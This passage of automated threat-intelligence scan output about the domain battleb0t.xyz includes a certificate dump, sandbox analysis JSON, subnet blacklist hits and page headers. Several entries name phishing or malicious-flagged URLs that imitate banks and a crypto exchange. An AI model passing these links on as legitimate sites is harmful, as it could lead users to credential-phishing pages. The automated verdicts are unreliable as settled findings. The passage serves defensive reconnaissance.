1c:5a:e2:e2:40:e3:be:d7:73:e5:51:b3:f0:08:0d:
a6:31:11:c5:bc:1d:5c:d2:b0:47:24:f8:d9:1e:d9:
72:fd:86:0b:d6:ac:4a:39:ad:f4:43:e7:b6:d3:16:
b9:d1:e5:c9:06:1d:ce:7c:25:06:4b:96:f2:9e:cb:
95:bc:80:ba:d7:9a:27:c3:51:67:b3:b0:6a:3f:9a:
e8:0b:b4:16:de:be:54:b1:18:14:ad:76:c7:23:c1:
08:4f:b6:99:58:df:3e:de:3d:0b:39:ef:c8:1d:bd:
ed:09:cf:81:92:ec:d8:74:46:47:9c:a4:42:fc:96:
89:c3:55:1e:f4:e7:49:b0:1d:55:06:19:4e:28:13:
c2:a1:7a:ff:d1:4f:38:19:a3:e0:4d:5a:68:ce:ea:
96:c0:01:60:48:f3:a6:ac:5d:db:48:50:b3:86:27:
96:7d
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
61:B8:A8:F3:B0:F5:FF:35:6D:A7:1D:C8:69:9E:4B:49:3E:DA:20:38
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/_haK7tXOc_M
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/QAbdIRPj4FY.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
33:ae:dc:a9:41:b2:ff:76:d8:16:a0:d6:b1:5d:1b:db:3c:51:
93:a6:fd:af:36:c1:59:1e:4b:0d:e6:0a:68:f5:5b:67:34:d6:
7c:a2:8f:90:10:2f:aa:b0:12:bb:81:fd:67:15:ed:d9:15:c1:
8f:5d:b8:52:a6:bc:40:4e:a4:3f:43:ef:65:92:60:20:d0:12:
48:ce:4b:b9:00:fd:36:8b:76:61:50:e7:da:3c:1a:3a:5f:db:
72:c2:bd:1e:38:be:f8:8e:de:f4:a4:78:e4:01:fa:06:51:d3:
6a:dc:fa:a9:19:00:c1:ae:b4:9f:af:62:50:c9:10:65:a2:ca:
97:5d:f7:7c:0c:f6:19:9f:39:9c:60:58:85:b8:8d:be:0a:5d:
7e:8f:0f:cd:3f:06:a9:b3:21:ec:e6:b3:e0:c5:3a:b8:3f:7c:
01:a3:c7:7d:dc:0a:7a:49:a1:6a:53:99:e3:04:53:97:7c:d1:
e8:e0:e6:80:50:bc:c9:d5:7f:a1:e4:1f:6b:f6:56:fd:81:32:
7b:6a:77:24:be:21:62:cb:d5:73:03:e6:d0:24:96:0d:16:ad:
36:c7:39:57:be:6a:0c:e1:3c:be:e8:78:08:a6:c6:71:fa:55:
b9:72:10:a6:f0:bd:1e:37:78:64:35:f8:06:57:c1:5e:e2:2e:
f5:04:6b:a3
|
| 2023-05-12 02:44:18 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.111.153 |
| 2023-05-12 02:46:36 | Netblock Membership | No | RIPE | 2 | 0 | 3 | 0 | None | 34.148.96.0/20 | 34.148.97.127 |
| 2023-05-12 03:31:58 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.0:8443 | 188.114.97.0/24 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00saadchaudhry.github.io]
https://www.openphish.com/feed.txt | 00saadchaudhry.github.io |
| 2023-05-12 02:54:19 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 18, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://npbruce.github.io/valkyrie/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:2076:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2076:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "Local\\SM0:3120:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:3120:120:WilError_01"\n "SM0:3120:304:WilStaging_02"\n "SM0:3120:120:WilError_01"\n "Local\\SM0:2076:120:WilError_01"\n "Local\\SM0:2076:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:2076:304:WilStaging_02"\n "SM0:2076:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:2076:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2076:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "142.251.46.234:443"\n "172.217.164.99:443"\n "192.30.255.116:443"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00002076]\n "typosquatting_list.pb" has type "data"- Location: [%TEMP%\\2076_314052531\\typosquatting_list.pb]- [targetUID: 00000000-00002076]\n "f38969098ae50137_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\f38969098ae50137_0]- [targetUID: 00000000-00002076]\n "ad000e355b853159_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\ad000e355b853159_0]- [targetUID: 00000000-00002076]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00002076]\n "f_00023e" has type "PNG image data 2394 x 1466 8-bit colormap non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00005516]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\manifest.json]- [targetUID: 00000000-00002076]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\manifest.fingerprint]- [targetUID: 00000000-00002076]\n "f_000243" has type "PNG image data 2880 x 1800 8-bit/color RGBA non-interlaced"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000243]- [targetUID: 00000000-00005516]\n "f_00023d" has type "gzip compressed data from Unix original size modulo 2^32 125617"- [targetUID: N/A]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2076_1612304720\\edge_checkout_page_validator.js]- [targetUID: 00000000-00002076]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\2076_2098649151\\adblock_snippet.js]- [targetUID: 00000000-00002076]\n "5a44bc8f-8ac3-49ff-81e3-d2694fc74cc3.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\5a44bc8f-8ac3-49ff-81e3-d2694fc74cc3.tmp]- [targetUID: 00000000-00002076]\n "361997ab-354a-4d80-b2b8-2a99e7ad455e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\361997ab-354a-4d80-b2b8-2a99e7ad455e.tmp]- [targetUID: 00000000-00002076]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00006184]\n "ad9deeb0-01f3-4e2c-89b5-726ac2308ce5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ad9deeb0-01f3-4e2c-89b5-726ac2308ce5.tmp]- [targetUID: 00000000-00002076]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00002076]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.44\\Ruleset Data]- [targetUID: 00000000-00002076]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2076_1612304720\\edge_driver.js]- [targetUID: 00000000-00002076]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://reactjs.org/docs/error-decoder.html?invariant=+e,n=1;n"\n Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "https://npbruce.github.io/valkyrie/"\n Pattern match: "http://www.w3.org/2000/svg\\n"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "https://npbruce.github.io"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://idsync.rlcdn.com,supports_spdy:true},{isolation:[],server:https://pippio.com,supports_spdy:true},{isolation:[],server:https://assets.msn.com,supports_spdy:true},{isolation:[],server:https://ntp.msn.com,supports_spdy:true}"\n Pattern match: "npbruce.github.io/valkyrie/"\n Heuristic match: "pbruce.github.io"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 172.217.164.99"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2076_1612304720\\edge_checkout_page_validator.js]- [targetUID: 00000000-00002076]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\2076_2098649151\\adblock_snippet.js]- [targetUID: 00000000-00002076]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2076_1612304720\\edge_driver.js]- [targetUID: 00000000-00002076]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2076_1612304720\\shopping.js]- [targetUID: 00000000-00002076]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2076_1612304720\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00002076]\n "product_page.js" has type "Unknown"- Location: [%TEMP%\\2076_1612304720\\product_page.js]- [targetUID: 00000000-00002076]\n "shoppingfre.js" has type "Unknown"- Location: [%TEMP%\\2076_1612304720\\shoppingfre.js]- [targetUID: 00000000-00002076]\n "shopping_iframe_driver.js" has type "Unknown"- Location: [%TEMP%\\2076_1612304720\\shopping_iframe_driver.js]- [targetUID: 00000000-00002076]\n "auto_open_controller.js" has type "Unknown"- Location: [%TEMP%\\2076_1612304720\\auto_open_controller.js]- [targetUID: 00000000-00002076]\n "edge_tracking_page_validator.js" has type "Unknown"- Location: [%TEMP%\\2076_1612304720\\edge_tracking_page_validator.js]- [targe | 185.199.109.153 |
| 2023-05-12 03:01:15 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.137): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:32 | Raw Data from RIRs | No | PhishStats | 0 | 0 | 2 | 0 | None | [{u'page_text': u' ', u'domain': None, u'virus_total': None, u'n_times_seen_ip': None, u'abuse_contact': None, u'ip': u'185.199.109.153', u'google_safebrowsing': None, u'threat_crowd': None, u'n_times_seen_domain': None, u'alexa_rank_host': None, u'id': 2310541, u'city': u'', u'abuse_ch_malware': None, u'countrycode': u'NL', u'title': u'Payment request', u'ssl_subject': None, u'technology': None, u'date_update': u'2020-12-08T01:50:24.000Z', u'zipcode': u'', u'alexa_rank_domain': None, u'score': None, u'vulns': None, u'latitude': u'52', u'regionname': u'', u'hash': u'626571f292283f42d1621b3d7cb9aa87ba7a14a373f3205743438d2b0b3807b0', u'threat_crowd_subdomain_count': None, u'screenshot': None, u'n_times_seen_host': None, u'ssl_issuer': None, u'domain_registered_n_days_ago': None, u'regioncode': u'', u'host': u'binance-eth.github.io', u'date': u'2018-07-08T03:03:10.000Z', u'asn': u'AS54113', u'tags': None, u'bgp': u'185.199.108.0/22', u'url': u'http://binance-eth.github.io/', u'isp': u'FASTLY - Fastly, US', u'longitude': u'4.89950000', u'ports': None, u'countryname': u'Netherlands', u'threat_crowd_votes': None, u'http_server': None, u'tld': u'io', u'os': None, u'http_code': None}] | 185.199.109.153 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.21): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:26 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 188.114.96.1:443 | 188.114.96.1 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 6 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:56:09 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://mashreq-dispute-refund-edd7e6.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "184.50.50.164:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1708"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_6ac_ConnHashTable<1708>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_6ac_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_6ac_IESQMMUTEX_0_331"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_6ac_ConnHashTable<1708>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_6ac_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1708"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_6ac_IESQMMUTEX_0_519"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "OF1UBMZL.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OF1UBMZL.txt]- [targetUID: 00000000-00003804]\n Dropped file: "2E0BQQCR.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2E0BQQCR.txt]- [targetUID: 00000000-00001708]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "OF1UBMZL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OF1UBMZL.txt]- [targetUID: 00000000-00003804]\n "_D5D21362-5F02-11ED-9265-080027EC57C5_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFCA1499D1E2A66278.TMP" has type "data"- Location: [%TEMP%\\~DFCA1499D1E2A66278.TMP]- [targetUID: 00000000-00001708]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "down_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "bullet_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "~DFA5965846D60398AC.TMP" has type "data"- Location: [%TEMP%\\~DFA5965846D60398AC.TMP]- [targetUID: 00000000-00001708]\n "~DFFE404849249527B2.TMP" has type "data"- Location: [%TEMP%\\~DFFE404849249527B2.TMP]- [targetUID: 00000000-00001708]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "2E0BQQCR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2E0BQQCR.txt]- [targetUID: 00000000-00001708]\n "background_gradient_1_" has type "JPEG image data JFIF standard 1.02 aspect ratio density 100x100 segment length 16 baseline precision 8 1x800 components 3"- [targetUID: N/A]\n "_CBCF1377-5F02-11ED-9265-080027EC57C5_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.5" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.5]- [targetUID: 00000000-00001708]\n "ErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "RecoveryStore._CBCF1375-5F02-11ED-9265-080027EC57C5_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF332AB4CC922D1A60.TMP" has type "data"- Location: [%TEMP%\\~DF332AB4CC922D1A60.TMP]- [targetUID: 00000000-00001708]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"HTTP/1.1 302 Moved Temporarily\nContent-Length: 0\nServer: Kestrel\nLocation: https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us\nRequest-Context: appId=cid-v1:7d63747b-487e-492a-872d-762362f77974\nX-Response-Cache-Status: True\nExpires: Tue, 08 Nov 2022 02:16:24 GMT\nCache-Control: max-age=0, no-cache, no-store\nPragma: no-cache\nDate: Tue, 08 Nov 2022 02:16:24 GMT\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://mashreq-dispute-refund-edd7e6.netlify.app/"\n Pattern match: "https://mashreq-dispute-refund-edd7e6.netlify.app"\n Pattern match: "https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"'}], u'threat_level': 0, u'size': None, u'job_id': u'6369bb23c90e715df924df2e', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'104.196.30.220', u'184.50.50.164'], u'sha256': u'45b03fe4427c993fcd3fd86ea0653b0e7cc007e8ad65e31581e62132e63f1e14', u'sha512': u'f2459ffd3027eab6323c80e5ca0b6a797f9d1095ed62fd365bd11cfe4249f3572511c926b2b58d3e78a537057ce3a9f5c7cc23433efb6650a3cf4a03799d3ad7', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://mashreq-dispute-refund-edd7e6.netlify.app/', u'submission_id': u'6369bb24c90e715df924df2f', u'created_at': u'2022-11-08T02:12:52+00:00', u'filename': None}], u'analysis_start_time': u'2022-11-08T02:12:52+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 2, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 7, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'af72a9839a79c4f79f56297858461027', u'network_mode': u'default', u'processes': [], u'sha1': u'997b927b8a2658babd3e07db566354809219e70b', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 104.196.30.220 |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.10): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [008security.github.io]
https://www.openphish.com/feed.txt | 008security.github.io |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | https://www.google-analytics.com/analytics.js | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<link rel="apple-touch-icon" href="logo.png">
<link rel="icon" href="logo.png">
<title>WebGL Fluid Simulation</title>
<meta name="description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:type" content="website">
<meta property="og:title" content="Webgl Fluid Simulation">
<meta property="og:description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:url" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/">
<meta property="og:image" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/logo.png">
<script type="text/javascript" src="dat.gui.min.js"></script>
<style>
@font-face {
font-family: 'iconfont';
src: url('iconfont.ttf') format('truetype');
}
* {
user-select: none;
}
html, body {
overflow: hidden;
background-color: #000;
}
body {
margin: 0;
position: fixed;
width: 100%;
height: 100%;
}
canvas {
width: 100%;
height: 100%;
}
.dg {
opacity: 0.9;
}
.dg .property-name {
overflow: visible;
}
.bigFont {
font-size: 150%;
color: #8C8C8C;
}
.cr.function.appBigFont {
font-size: 150%;
line-height: 27px;
color: #A5F8D3;
background-color: #023C40;
}
.cr.function.appBigFont .property-name {
float: none;
}
.cr.function.appBigFont .icon {
position: sticky;
bottom: 27px;
}
.icon {
font-family: 'iconfont';
font-size: 130%;
float: right;
}
.twitter:before {
content: 'a';
}
.github:before {
content: 'b';
}
.app:before {
content: 'c';
}
.discord:before {
content: 'd';
}
.promo {
display: none;
/* display: table; */
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: 1;
overflow: auto;
